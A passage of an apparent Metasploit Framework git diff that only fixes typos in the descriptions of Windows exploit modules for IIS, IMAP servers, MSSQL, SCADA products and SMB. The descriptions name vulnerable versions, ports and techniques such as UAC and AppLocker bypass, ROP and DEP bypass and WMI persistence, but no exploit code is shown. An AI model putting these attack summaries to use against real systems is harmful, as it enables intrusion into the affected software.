execute a payload on Umbraco CMS 4.7.0.378. The payload is uploaded as an ASPX script by sending a specially crafted - SOAP request to codeEditorSave.asmx, which permits unauthorised file upload + SOAP request to codeEditorSave.asmx, which permits unauthorized file upload via the SaveDLRScript operation. SaveDLRScript is also subject to a path traversal vulnerability, allowing code to be placed into the web-accessible /umbraco/ directory. diff --git a/modules/exploits/windows/iis/ms02_018_htr.rb b/modules/exploits/windows/iis/ms02_018_htr.rb index 972f64f4c3..57e7ed96e9 100644 --- a/modules/exploits/windows/iis/ms02_018_htr.rb +++ b/modules/exploits/windows/iis/ms02_018_htr.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This exploits a buffer overflow in the ISAPI ISM.DLL used to process HTR scripting in IIS 4.0. This module works against - Windows NT 4 Service Packs 3, 4, and 5. The server will + Windows NT 4 Service Packs 3, 4, and 5. The server will continue to process requests until the payload being executed has exited. If you've set EXITFUNC to 'seh', the server will continue processing requests, but you will have diff --git a/modules/exploits/windows/imap/imail_delete.rb b/modules/exploits/windows/imap/imail_delete.rb index 1c9e9173d9..99719ef8e1 100644 --- a/modules/exploits/windows/imap/imail_delete.rb +++ b/modules/exploits/windows/imap/imail_delete.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'IMail IMAP4D Delete Overflow', 'Description' => %q{ This module exploits a buffer overflow in the 'DELETE' - command of the the IMail IMAP4D service. This vulnerability + command of the IMail IMAP4D service. This vulnerability can only be exploited with a valid username and password. This flaw was patched in version 8.14. }, diff --git a/modules/exploits/windows/imap/novell_netmail_status.rb b/modules/exploits/windows/imap/novell_netmail_status.rb index ec6af0305e..e5a7a49317 100644 --- a/modules/exploits/windows/imap/novell_netmail_status.rb +++ b/modules/exploits/windows/imap/novell_netmail_status.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Novell NetMail IMAP STATUS Buffer Overflow', 'Description' => %q{ - This module exploits a stack buffer overflow in Novell's Netmail 3.52 IMAP STATUS + This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP STATUS verb. By sending an overly long string, an attacker can overwrite the buffer and control program execution. }, diff --git a/modules/exploits/windows/license/calicclnt_getconfig.rb b/modules/exploits/windows/license/calicclnt_getconfig.rb index bc7c633104..48533a760f 100644 --- a/modules/exploits/windows/license/calicclnt_getconfig.rb +++ b/modules/exploits/windows/license/calicclnt_getconfig.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Computer Associates License Client GETCONFIG Overflow', 'Description' => %q{ - This module exploits an vulnerability in the CA License Client + This module exploits a vulnerability in the CA License Client service. This exploit will only work if your IP address can be resolved from the target system point of view. This can be accomplished on a local network by running the 'nmbd' service diff --git a/modules/exploits/windows/local/applocker_bypass.rb b/modules/exploits/windows/local/applocker_bypass.rb index facf89531c..4665dd436d 100644 --- a/modules/exploits/windows/local/applocker_bypass.rb +++ b/modules/exploits/windows/local/applocker_bypass.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Local super(update_info(info, 'Name' => 'AppLocker Execution Prevention Bypass', 'Description' => %q{ - This module will generate a .NET service executable on the target and utilise + This module will generate a .NET service executable on the target and utilize InstallUtil to run the payload bypassing the AppLocker protection. Currently only the InstallUtil method is provided, but future methods can be diff --git a/modules/exploits/windows/local/bypassuac_injection.rb b/modules/exploits/windows/local/bypassuac_injection.rb index 442c7cfc5e..42dd874d1f 100644 --- a/modules/exploits/windows/local/bypassuac_injection.rb +++ b/modules/exploits/windows/local/bypassuac_injection.rb @@ -22,11 +22,11 @@ class MetasploitModule < Msf::Exploit::Local This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off. This module uses the Reflective DLL Injection - technique to drop only the DLL payload binary instead of three seperate + technique to drop only the DLL payload binary instead of three separate binaries in the standard technique. However, it requires the correct architecture to be selected, (use x64 for SYSWOW64 systems also). If specifying EXE::Custom your DLL should call ExitProcess() after starting - your payload in a seperate process. + your payload in a separate process. }, 'License' => MSF_LICENSE, 'Author' => [ diff --git a/modules/exploits/windows/local/ms10_015_kitrap0d.rb b/modules/exploits/windows/local/ms10_015_kitrap0d.rb index 42fbe5dfd3..f195409a4f 100644 --- a/modules/exploits/windows/local/ms10_015_kitrap0d.rb +++ b/modules/exploits/windows/local/ms10_015_kitrap0d.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Local 'Name' => 'Windows SYSTEM Escalation via KiTrap0D', 'Description' => %q{ This module will create a new session with SYSTEM privileges via the - KiTrap0D exlpoit by Tavis Ormandy. If the session is use is already + KiTrap0D exploit by Tavis Ormandy. If the session in use is already elevated then the exploit will not run. The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows. }, diff --git a/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb b/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb index 33e7621dab..04c5b66dd2 100644 --- a/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb +++ b/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb @@ -26,7 +26,7 @@ class MetasploitModule < Msf::Exploit::Local with a call to NtQueryIntervalProfile will execute shellcode. This module will elevate itself to SYSTEM, then inject the payload - into another SYSTEM process before restoring it's own token to + into another SYSTEM process before restoring its own token to avoid causing system instability. ), 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/local/ms15_078_atmfd_bof.rb b/modules/exploits/windows/local/ms15_078_atmfd_bof.rb index d57baf0588..e56aac1e70 100644 --- a/modules/exploits/windows/local/ms15_078_atmfd_bof.rb +++ b/modules/exploits/windows/local/ms15_078_atmfd_bof.rb @@ -35,8 +35,8 @@ class MetasploitModule < Msf::Exploit::Local 'Name' => 'MS15-078 Microsoft Windows Font Driver Buffer Overflow', 'Description' => %q{ This module exploits a pool based buffer overflow in the atmfd.dll driver when parsing - a malformed font. The vulnerability was exploited by the hacking team and disclosed on - the july data leak. This module has been tested successfully on vulnerable builds of + a malformed font. The vulnerability was exploited by the hacking team and disclosed in + the July data leak. This module has been tested successfully on vulnerable builds of Windows 8.1 x64. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/local/ms16_016_webdav.rb b/modules/exploits/windows/local/ms16_016_webdav.rb index c9db432e06..2eca69259a 100644 --- a/modules/exploits/windows/local/ms16_016_webdav.rb +++ b/modules/exploits/windows/local/ms16_016_webdav.rb @@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Local 'Name' => 'MS16-016 mrxdav.sys WebDav Local Privilege Escalation', 'Description' => %q{ This module exploits the vulnerability in mrxdav.sys described by MS16-016. The module will spawn - a process on the target system and elevate it's privileges to NT AUTHORITY\SYSTEM before executing + a process on the target system and elevate its privileges to NT AUTHORITY\SYSTEM before executing the specified payload within the context of the elevated process. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/local/panda_psevents.rb b/modules/exploits/windows/local/panda_psevents.rb index bb3bb2c098..02af138582 100644 --- a/modules/exploits/windows/local/panda_psevents.rb +++ b/modules/exploits/windows/local/panda_psevents.rb @@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Local Vulnerable Products: Panda Global Protection 2016 (<=16.1.2) Panda Antivirus Pro 2016 (<=16.1.2) - Panda Small Busines Protetion (<=16.1.2) + Panda Small Business Protection (<=16.1.2) Panda Internet Security 2016 (<=16.1.2) }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/local/run_as.rb b/modules/exploits/windows/local/run_as.rb index a590cf92b9..f920dd58c1 100644 --- a/modules/exploits/windows/local/run_as.rb +++ b/modules/exploits/windows/local/run_as.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Local 'Description' => %q{ This module will login with the specified username/password and execute the supplied command as a hidden process. Output is not returned by default. - Unless targetting a local user either set the DOMAIN, or specify a UPN user + Unless targeting a local user either set the DOMAIN, or specify a UPN user format (e.g. user@domain). This uses the CreateProcessWithLogonW WinAPI function. A custom command line can be sent instead of uploading an executable. diff --git a/modules/exploits/windows/local/virtual_box_opengl_escape.rb b/modules/exploits/windows/local/virtual_box_opengl_escape.rb index 4879a2fcd6..e3ff6051ab 100644 --- a/modules/exploits/windows/local/virtual_box_opengl_escape.rb +++ b/modules/exploits/windows/local/virtual_box_opengl_escape.rb @@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Local vulnerability exists in the remote rendering of OpenGL-based 3D graphics. By sending a sequence of specially crafted rendering messages, a virtual machine can exploit an out of bounds array access to corrupt memory and escape to the host. This module has been - tested successfully on Windows 7 SP1 (64 bits) as Host running Virtual Box 4.3.6. + tested successfully on Windows 7 SP1 (64 bits) as Host running Virtual Box 4.3.6. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/local/wmi_persistence.rb b/modules/exploits/windows/local/wmi_persistence.rb index bcb068b3c3..bf28f0ed4f 100644 --- a/modules/exploits/windows/local/wmi_persistence.rb +++ b/modules/exploits/windows/local/wmi_persistence.rb @@ -27,8 +27,8 @@ class MetasploitModule < Msf::Exploit::Local The INTERVAL method will create an event filter that triggers the payload after the specified CALLBACK_INTERVAL. The LOGON method will create an event filter that will trigger the payload after the system has an uptime of 4 minutes. The PROCESS method will create an event filter that triggers the payload when the specified process is started. The WAITFOR method - creates an event filter that utilises the Microsoft binary waitfor.exe to wait for a signal specified by WAITFOR_TRIGGER - before executing the payload. The signal can be sent from a windows host on a LAN utilising the waitfor.exe command + creates an event filter that utilizes the Microsoft binary waitfor.exe to wait for a signal specified by WAITFOR_TRIGGER + before executing the payload. The signal can be sent from a windows host on a LAN utilizing the waitfor.exe command (note: requires target to have port 445 open). Additionally a custom command can be specified to run once the trigger is activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a high integrity process. It is also recommended not to use stageless payloads due to powershell script length limitations. diff --git a/modules/exploits/windows/lpd/wincomlpd_admin.rb b/modules/exploits/windows/lpd/wincomlpd_admin.rb index c1dd455671..3ff96f380f 100644 --- a/modules/exploits/windows/lpd/wincomlpd_admin.rb +++ b/modules/exploits/windows/lpd/wincomlpd_admin.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a stack buffer overflow in WinComLPD <= 3.0.2. By sending an overly long authentication packet to the remote - adminstration service, an attacker may be able to execute arbitrary + administration service, an attacker may be able to execute arbitrary code. }, 'Author' => 'MC', diff --git a/modules/exploits/windows/misc/allmediaserver_bof.rb b/modules/exploits/windows/misc/allmediaserver_bof.rb index 60cf970353..e38ec9cb95 100644 --- a/modules/exploits/windows/misc/allmediaserver_bof.rb +++ b/modules/exploits/windows/misc/allmediaserver_bof.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote is caused due to a boundary error within the handling of HTTP request. While the exploit supports DEP bypass via ROP, on Windows 7 the stack pivoting isn't - reliable across virtual (VMWare, VirtualBox) and physical environments. Because of + reliable across virtual (VMWare, VirtualBox) and physical environments. Because of this the module isn't using DEP bypass on the Windows 7 SP1 target, where by default DEP is OptIn and AllMediaServer won't run with DEP. }, diff --git a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb index f9896581b1..479d87bde5 100644 --- a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb +++ b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote command. Additionally the filename option in the same command can be used to launch a directory traversal attack and achieve arbitrary file upload. - The module uses uses the Windows Management Instrumentation service to execute an + The module uses the Windows Management Instrumentation service to execute an arbitrary payload on vulnerable installations of BigAnt on Windows XP and 2003. It has been successfully tested on BigAnt Server 2.97 SP7 over Windows XP SP3 and 2003 SP2. diff --git a/modules/exploits/windows/misc/fb_cnct_group.rb b/modules/exploits/windows/misc/fb_cnct_group.rb index 4207c36860..835342afca 100644 --- a/modules/exploits/windows/misc/fb_cnct_group.rb +++ b/modules/exploits/windows/misc/fb_cnct_group.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote This module uses an existing call to memcpy, just prior to the vulnerable code, which allows a small amount of data to be written to the stack. A two-phases - stackpivot allows to execute the ROP chain which ultimately is used to execute + stack pivot allows to execute the ROP chain which ultimately is used to execute VirtualAlloc and bypass DEP. }, 'Author' => 'Spencer McIntyre', diff --git a/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb b/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb index 2bab2f7f54..a5accdcda6 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb @@ -15,8 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'HP Data Protector 8.10 Remote Command Execution', 'Description' => %q{ This module exploits a remote command execution on HP Data Protector 8.10. Arbitrary - commands can be execute by sending crafted requests with opcode 28 to the OmniInet - service listening on the TCP/5555 port. Since there is an strict length limitation on + commands can be executed by sending crafted requests with opcode 28 to the OmniInet + service listening on the TCP/5555 port. Since there is a strict length limitation on the command, rundll32.exe is executed, and the payload is provided through a DLL by a fake SMB server. This module has been tested successfully on HP Data Protector 8.1 on Windows 7 SP1. diff --git a/modules/exploits/windows/misc/hp_dataprotector_install_service.rb b/modules/exploits/windows/misc/hp_dataprotector_install_service.rb index 49af5167d8..6b0fedbc0d 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_install_service.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_install_service.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'HP Data Protector 6.10/6.11/6.20 Install Service', 'Description' => %q{ - This module exploits HP Data Protector Omniinet process on Windows only. + This module exploits HP Data Protector OmniInet process on Windows only. This exploit invokes the install service function which allows an attacker to create a custom payload in the format of an executable. diff --git a/modules/exploits/windows/misc/hp_omniinet_3.rb b/modules/exploits/windows/misc/hp_omniinet_3.rb index e15d95d86d..109d5a403a 100644 --- a/modules/exploits/windows/misc/hp_omniinet_3.rb +++ b/modules/exploits/windows/misc/hp_omniinet_3.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'HP OmniInet.exe Opcode 27 Buffer Overflow', 'Description' => %q{ - This module exploits a buffer overflow in the Hewlett-Packard + This module exploits a buffer overflow in the Hewlett-Packard OmniInet NT Service. By sending a specially crafted opcode 27 packet, a remote attacker may be able to execute arbitrary code. }, diff --git a/modules/exploits/windows/misc/mini_stream.rb b/modules/exploits/windows/misc/mini_stream.rb index 0a9834f53b..301d921fc3 100644 --- a/modules/exploits/windows/misc/mini_stream.rb +++ b/modules/exploits/windows/misc/mini_stream.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Mini-Stream 3.0.1.1 Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1 - By creating a specially crafted pls file, an an attacker may be able + By creating a specially crafted pls file, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/misc/splayer_content_type.rb b/modules/exploits/windows/misc/splayer_content_type.rb index 8972d07b35..18803748be 100644 --- a/modules/exploits/windows/misc/splayer_content_type.rb +++ b/modules/exploits/windows/misc/splayer_content_type.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => "SPlayer 3.7 Content-Type Buffer Overflow", 'Description' => %q{ - This module exploits a vulnerability in SPlayer v3.7 or piror. When SPlayer + This module exploits a vulnerability in SPlayer v3.7 or prior. When SPlayer requests the URL of a media file (video or audio), it is possible to gain arbitrary remote code execution due to a buffer overflow caused by an exceeding length of data as the 'Content-Type' parameter. diff --git a/modules/exploits/windows/misc/stream_down_bof.rb b/modules/exploits/windows/misc/stream_down_bof.rb index 4183d0abb6..04a6a2f070 100644 --- a/modules/exploits/windows/misc/stream_down_bof.rb +++ b/modules/exploits/windows/misc/stream_down_bof.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'CoCSoft StreamDown 6.8.0 Buffer Overflow', 'Description' => %q{ Stream Down 6.8.0 seh based buffer overflow triggered when processing - the server reponse packet.During the overflow a structured exception + the server response packet. During the overflow a structured exception handler is overwritten. }, 'Author' => 'Fady Mohamed Osman ', diff --git a/modules/exploits/windows/misc/windows_rsh.rb b/modules/exploits/windows/misc/windows_rsh.rb index 8e0b046f6e..e98c90f778 100644 --- a/modules/exploits/windows/misc/windows_rsh.rb +++ b/modules/exploits/windows/misc/windows_rsh.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Windows RSH Daemon Buffer Overflow', 'Description' => %q{ - This module exploits a vulnerabliltiy in Windows RSH daemon 1.8. + This module exploits a vulnerability in Windows RSH daemon 1.8. The vulnerability is due to a failure to check for the length of input sent to the RSH server. A CPORT of 512 -> 1023 must be configured for the exploit to be successful. diff --git a/modules/exploits/windows/misc/wireshark_lua.rb b/modules/exploits/windows/misc/wireshark_lua.rb index 2a577b4a44..7e3a0fbf07 100644 --- a/modules/exploits/windows/misc/wireshark_lua.rb +++ b/modules/exploits/windows/misc/wireshark_lua.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => "Wireshark console.lua Pre-Loading Script Execution", 'Description' => %q{ - This modules exploits a vulnerability in Wireshark 1.6 or less. When opening a + This module exploits a vulnerability in Wireshark 1.6 or less. When opening a pcap file, Wireshark will actually check if there's a 'console.lua' file in the same directory, and then parse/execute the script if found. Versions affected by this vulnerability: 1.6.0 to 1.6.1, 1.4.0 to 1.4.8 diff --git a/modules/exploits/windows/misc/wireshark_packet_dect.rb b/modules/exploits/windows/misc/wireshark_packet_dect.rb index 7ce4a89a34..89a0351356 100644 --- a/modules/exploits/windows/misc/wireshark_packet_dect.rb +++ b/modules/exploits/windows/misc/wireshark_packet_dect.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Wireshark packet-dect.c Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Wireshark <= 1.4.4 - by sending an malicious packet. + by sending a malicious packet. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/motorola/timbuktu_fileupload.rb b/modules/exploits/windows/motorola/timbuktu_fileupload.rb index 00c492eef1..0de5bdcb6a 100644 --- a/modules/exploits/windows/motorola/timbuktu_fileupload.rb +++ b/modules/exploits/windows/motorola/timbuktu_fileupload.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Timbuktu Pro Directory Traversal/File Upload', 'Description' => %q{ - This module exploits a directory traversal vulnerablity in Motorola's + This module exploits a directory traversal vulnerability in Motorola's Timbuktu Pro for Windows 8.6.5. }, 'Author' => [ 'MC' ], diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb index 45793d5786..5420a0e997 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb @@ -27,7 +27,7 @@ class MetasploitModule < Msf::Exploit::Remote This exploit smashes several pointers, as shown below. 1. pointer to a 32-bit value that is set to 0 - 2. pointer to a 32-bit value that is set to a length influcenced by the buffer + 2. pointer to a 32-bit value that is set to a length influenced by the buffer length. 3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000, this value is referenced with a displacement of 0x38. For MSSQL 2005, the diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb index 409ef5346e..e786810528 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb @@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote This exploit smashes several pointers, as shown below. 1. pointer to a 32-bit value that is set to 0 - 2. pointer to a 32-bit value that is set to a length influcenced by the buffer + 2. pointer to a 32-bit value that is set to a length influenced by the buffer length. 3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000, this value is referenced with a displacement of 0x38. For MSSQL 2005, the diff --git a/modules/exploits/windows/mssql/mssql_linkcrawler.rb b/modules/exploits/windows/mssql/mssql_linkcrawler.rb index 9fa775f868..0b019721b1 100644 --- a/modules/exploits/windows/mssql/mssql_linkcrawler.rb +++ b/modules/exploits/windows/mssql/mssql_linkcrawler.rb @@ -25,7 +25,7 @@ class MetasploitModule < Msf::Exploit::Remote up a exploit/multi/handler to run in the background as a job to support multiple incoming shells. - If you are interested in deploying payloads to spefic servers this module also + If you are interested in deploying payloads to specific servers this module also supports that functionality via the "DEPLOYLIST" option. Currently, the module is capable of delivering payloads to both 32bit and 64bit diff --git a/modules/exploits/windows/mssql/mssql_payload.rb b/modules/exploits/windows/mssql/mssql_payload.rb index a11b0f6b52..4bb86ac3d1 100644 --- a/modules/exploits/windows/mssql/mssql_payload.rb +++ b/modules/exploits/windows/mssql/mssql_payload.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote the "xp_cmdshell" stored procedure. Currently, three delivery methods are supported. First, the original method uses Windows 'debug.com'. File size restrictions are - avoidied by incorporating the debug bypass method presented by SecureStat at + avoided by incorporating the debug bypass method presented by SecureStat at Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems. A second method takes advantage of the Command Stager subsystem. This allows using diff --git a/modules/exploits/windows/mssql/mssql_payload_sqli.rb b/modules/exploits/windows/mssql/mssql_payload_sqli.rb index ba54836cb3..1715ff15b2 100644 --- a/modules/exploits/windows/mssql/mssql_payload_sqli.rb +++ b/modules/exploits/windows/mssql/mssql_payload_sqli.rb @@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote Currently, three delivery methods are supported. First, the original method uses Windows 'debug.com'. File size restrictions are - avoidied by incorporating the debug bypass method presented by SecureStat at + avoided by incorporating the debug bypass method presented by SecureStat at Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems. A second method takes advantage of the Command Stager subsystem. This allows using diff --git a/modules/exploits/windows/oracle/tns_arguments.rb b/modules/exploits/windows/oracle/tns_arguments.rb index 081d5c44ef..15353554dc 100644 --- a/modules/exploits/windows/oracle/tns_arguments.rb +++ b/modules/exploits/windows/oracle/tns_arguments.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Oracle 8i. When - sending a specially crafted packet containing a overly long + sending a specially crafted packet containing an overly long ARGUMENTS string to the TNS service, an attacker may be able to execute arbitrary code. }, diff --git a/modules/exploits/windows/scada/daq_factory_bof.rb b/modules/exploits/windows/scada/daq_factory_bof.rb index 2b1173ceed..ec883aed77 100644 --- a/modules/exploits/windows/scada/daq_factory_bof.rb +++ b/modules/exploits/windows/scada/daq_factory_bof.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'DaqFactory HMI NETB Request Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Azeotech's DaqFactory - product. The specfic vulnerability is triggered when sending a specially crafted + product. The specific vulnerability is triggered when sending a specially crafted 'NETB' request to port 20034. Exploitation of this vulnerability may take a few seconds due to the use of egghunter. This vulnerability was one of the 14 releases discovered by researcher Luigi Auriemma. diff --git a/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb b/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb index fce4e3a57f..cfa6ca1f24 100644 --- a/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb +++ b/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module abuses the gefebt.exe component in GE Proficy CIMPLICITY, reachable through the CIMPLICIY CimWebServer. The vulnerable component allows to execute remote BCL files in - shared resources. An attacker can abuse this behaviour to execute a malicious BCL and + shared resources. An attacker can abuse this behavior to execute a malicious BCL and drop an arbitrary EXE. The last one can be executed remotely through the WebView server. This module has been tested successfully in GE Proficy CIMPLICITY 7.5 with the embedded CimWebServer. This module starts a WebDAV server to provide the malicious BCL files. If diff --git a/modules/exploits/windows/scada/indusoft_webstudio_exec.rb b/modules/exploits/windows/scada/indusoft_webstudio_exec.rb index 7ad8893628..5ce73ca6c1 100644 --- a/modules/exploits/windows/scada/indusoft_webstudio_exec.rb +++ b/modules/exploits/windows/scada/indusoft_webstudio_exec.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote Web Studio Remote Agent, that allows a remote attacker to write arbitrary files to the filesystem, by abusing the functions provided by the software. - The module uses uses the Windows Management Instrumentation service to execute an + The module uses the Windows Management Instrumentation service to execute an arbitrary payload on vulnerable installations of InduSoft Web Studio on Windows pre Vista. It has been successfully tested on InduSoft Web Studio 6.1 SP6 over Windows XP SP3 and Windows 2003 SP2. diff --git a/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb b/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb index dd1f914955..c611b2679f 100644 --- a/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb +++ b/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote SCADA Server 2.1 and below. By supplying a specially crafted On_FC_BINFILE_FCS_*FILE packet via port 910, RealWin will try to create a file (which would be saved to C:\Program Files\DATAC\Real Win\RW-version\filename) by first copying the user- - supplied filename with a inline memcpy routine without proper bounds checking, which + supplied filename with an inline memcpy routine without proper bounds checking, which results a stack-based buffer overflow, allowing arbitrary remote code execution. Tested version: 2.0 (Build 6.1.8.10) diff --git a/modules/exploits/windows/scada/scadapro_cmdexe.rb b/modules/exploits/windows/scada/scadapro_cmdexe.rb index 49b8242736..7af6fc5c3c 100644 --- a/modules/exploits/windows/scada/scadapro_cmdexe.rb +++ b/modules/exploits/windows/scada/scadapro_cmdexe.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Measuresoft ScadaPro Remote Command Execution', 'Description' => %q{ - This module allows remote attackers to execute arbitray commands on the + This module allows remote attackers to execute arbitrary commands on the affected system by abusing via Directory Traversal attack when using the 'xf' command (execute function). An attacker can execute system() from msvcrt.dll to upload a backdoor and gain remote code execution. This diff --git a/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb b/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb index bd597f7009..355b633083 100644 --- a/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb +++ b/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb @@ -12,9 +12,9 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow', 'Description' => %q{ - This module exploits an stack based buffer overflow on Yokogawa CS3000. The vulnerability + This module exploits a stack based buffer overflow on Yokogawa CS3000. The vulnerability exists in the service BKFSim_vhfd.exe when using malicious user-controlled data to create - logs using functions like vsprintf and memcpy in a insecure way. This module has been + logs using functions like vsprintf and memcpy in an insecure way. This module has been tested successfully on Yokogawa Centum CS3000 R3.08.50 over Windows XP SP3. }, 'Author' => diff --git a/modules/exploits/windows/smb/generic_smb_dll_injection.rb b/modules/exploits/windows/smb/generic_smb_dll_injection.rb index 4f0bab3fdf..6a03a0623f 100644 --- a/modules/exploits/windows/smb/generic_smb_dll_injection.rb +++ b/modules/exploits/windows/smb/generic_smb_dll_injection.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Generic DLL Injection From Shared Resource', 'Description' => %q{ This is a general-purpose module for exploiting conditions where a DLL can be loaded - from an specified SMB share. This module serves payloads as DLLs over an SMB service. + from a specified SMB share. This module serves payloads as DLLs over an SMB service. }, 'Author' => [ diff --git a/modules/exploits/windows/smb/ms04_007_killbill.rb b/modules/exploits/windows/smb/ms04_007_killbill.rb index 58121746a1..df5a44880f 100644 --- a/modules/exploits/windows/smb/ms04_007_killbill.rb +++ b/modules/exploits/windows/smb/ms04_007_killbill.rb @@ -22,14 +22,14 @@ class MetasploitModule < Msf::Exploit::Remote You are only allowed one attempt with this vulnerability. If the payload fails to execute, the LSASS system service will crash and the target system will automatically reboot itself - in 60 seconds. If the payload succeeeds, the system will no + in 60 seconds. If the payload succeeds, the system will no longer be able to process authentication requests, denying all attempts to login through SMB or at the console. A reboot is required to restore proper functioning of an exploited system. This exploit has been successfully tested with the win32/*/reverse_tcp - payloads, however a few problems were encounted when using the + payloads, however a few problems were encountered when using the equivalent bind payloads. Your mileage may vary. }, diff --git a/modules/exploits/windows/smb/ms06_070_wkssvc.rb b/modules/exploits/windows/smb/ms06_070_wkssvc.rb index 7c57f771fa..229f3f6250 100644 --- a/modules/exploits/windows/smb/ms06_070_wkssvc.rb +++ b/modules/exploits/windows/smb/ms06_070_wkssvc.rb @@ -17,9 +17,9 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack buffer overflow in the NetApi32 NetpManageIPCConnect function using the Workstation service in Windows 2000 SP4 and Windows XP SP2. - In order to exploit this vulnerability, you must specify a the name of 